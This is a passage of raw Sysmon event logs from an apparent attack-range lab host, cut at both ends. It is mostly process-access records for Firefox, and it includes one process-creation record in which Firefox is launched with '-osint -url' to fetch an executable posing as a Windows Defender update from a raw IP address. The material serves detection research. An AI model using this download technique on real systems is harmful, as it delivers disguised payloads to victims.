Firefox\firefox.exe0x1010C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000043791Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:00.218{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E4A3-63C7-4D06-00000000AF02}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000043790Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:00.218{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E4A3-63C7-4D06-00000000AF02}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000043789Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:00.217{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E4A3-63C7-4D06-00000000AF02}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1010C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000043788Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:00.217{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E4A3-63C7-4D06-00000000AF02}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000043787Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:00.217{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E4A3-63C7-4D06-00000000AF02}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000043786Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:00.217{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8327004C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043785Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:00.217{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8327004C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043784Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:00.216{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8327004C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043783Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:00.216{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8327004C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043782Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:00.216{FE4C2B44-DDF4-63C7-A004-00000000AF02}47002992C:\Windows\system32\csrss.exe{FE4C2B44-E4A4-63C7-5006-00000000AF02}3588C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000043781Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:00.216{FE4C2B44-E4A2-63C7-4806-00000000AF02}32407044C:\Program Files\Mozilla Firefox\firefox.exe{FE4C2B44-E4A4-63C7-5006-00000000AF02}3588C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+6e193|C:\Windows\System32\ADVAPI32.dll+188af|C:\Program Files\Mozilla Firefox\firefox.exe+ac12|C:\Program Files\Mozilla Firefox\firefox.exe+6673|C:\Program Files\Mozilla Firefox\xul.dll+7a8fbe|C:\Program Files\Mozilla Firefox\xul.dll+9e365b|C:\Program Files\Mozilla Firefox\xul.dll+9e1625|C:\Program Files\Mozilla Firefox\xul.dll+9e934e|C:\Program Files\Mozilla Firefox\xul.dll+82fb43|C:\Program Files\Mozilla Firefox\xul.dll+17e59b8|C:\Program Files\Mozilla Firefox\xul.dll+17d1c3b|C:\Program Files\Mozilla Firefox\xul.dll+9d10af|C:\Program Files\Mozilla Firefox\xul.dll+1f57e|C:\Program Files\Mozilla Firefox\xul.dll+833d37|C:\Program Files\Mozilla Firefox\nss3.dll+7318c|C:\Program Files\Mozilla Firefox\nss3.dll+885b1|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Program Files\Mozilla Firefox\mozglue.dll+1f968|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000043780Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:00.216{FE4C2B44-E4A4-63C7-5006-00000000AF02}3588C:\Program Files\Mozilla Firefox\firefox.exe109.0FirefoxFirefoxMozilla Corporationfirefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3240.7.1985826434\1205477185" -childID 6 -isForBrowser -prefsHandle 4580 -prefMapHandle 4668 -prefsLen 31523 -prefMapSize 234522 -jsInitHandle 1108 -jsInitLen 246772 -a11yResourceId 64 -parentBuildID 20230112150232 -appDir "C:\Program Files\Mozilla Firefox\browser" - {7f793e54-080c-49e4-8e6f-9d4cbb3c5d94} 3240 "\\.\pipe\gecko-crash-server-pipe.3240" 4408 1d97a0caa58 tabC:\Program Files (x86)\Foxit Software\Foxit PDF Reader\ATTACKRANGE\Administrator{FE4C2B44-DDF6-63C7-BDF1-300000000000}0x30f1bd2LowMD5=66A6B001D806D3117BBA41DD55C08DE0,SHA256=0FC5FD25E5CB032AF0E867B74AD8FCB3A0F5803F3C661E398D5A03448C5CA946,IMPHASH=B9CD654B3D499FE4AD9B5E6D464FD125{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url http://45.139.105.143/d/rsWinDefendUpdateCheck.exe 10341000x800000000000000043779Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:00.215{FE4C2B44-D9F5-63C7-1200-00000000AF02}7565760C:\Windows\System32\svchost.exe{FE4C2B44-E4A4-63C7-5006-00000000AF02}3588C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043778Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:00.214{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043777Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:00.214{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043776Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:00.214{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043775Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:00.214{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043774Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:00.214{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043773Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:00.214{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043772Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:00.214{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043771Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:00.213{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043770Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:00.213{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043769Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:00.213{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043768Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:00.213{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043767Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:00.213{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla 